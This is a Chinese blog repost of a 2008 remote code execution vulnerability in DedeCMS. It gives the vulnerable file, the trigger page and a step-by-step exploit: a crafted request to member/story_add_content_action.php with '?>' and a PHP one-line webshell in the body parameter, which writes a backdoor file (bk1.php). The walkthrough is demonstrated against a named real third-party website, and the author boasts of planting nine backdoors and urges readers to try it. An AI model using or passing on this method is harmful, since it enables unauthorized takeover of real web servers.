织梦(Dedecms)任意代码执行漏洞 不指定

jed , 2008-5-26 08:24 , 杀毒防毒 , 评论(0) , 阅读(2898) , Via 本站原创 | |
http://www.hacker.com.cn/down/view_17022.html

织梦网任意代码执行漏洞

放在vip区里了。具体情况还不清楚。自称是首发.有VIP的朋友可以下来看看.
用dedecms 朋友还是小心点吧。

漏洞页面是    \include\inc_bookfunctions.php
触发页面是 member/story_add_content_action.php

xinca的漏洞公告如下:

嘿嘿。。说实话,利用方法特别简单。反正闲着也是闲着,我就拿其中一个小站给大家演示下利用过程吧。


演示地址:http://www.guo3.com/   (技术交流 站长不要找我啊)



首先注册个账号,然后登陆。
点击在新窗口中浏览此图片


接着就是打开下面的地址:

http://www.guo3.com/member/story_add_content_action.php?chapterid=1&arcID=1&body=?>后面加上一句话代码。当你看到成功的提示就表示成功了。
点击在新窗口中浏览此图片


然后打开http://www.guo3.com/data/textdata/1/bk1.php就是我们生成的后门。如果一次没成功想再重来一遍的话,下次生成的文件就变成bk2.php。以此类推。这里我试了9次,嘿嘿。。。
点击在新窗口中浏览此图片


方法既然已经出来了,大家就赶快动手去玩吧。

Tags: , ,
发表评论

昵称

网址

电邮

打开HTML 打开UBB 打开表情 隐藏 记住我 [登入] [注册]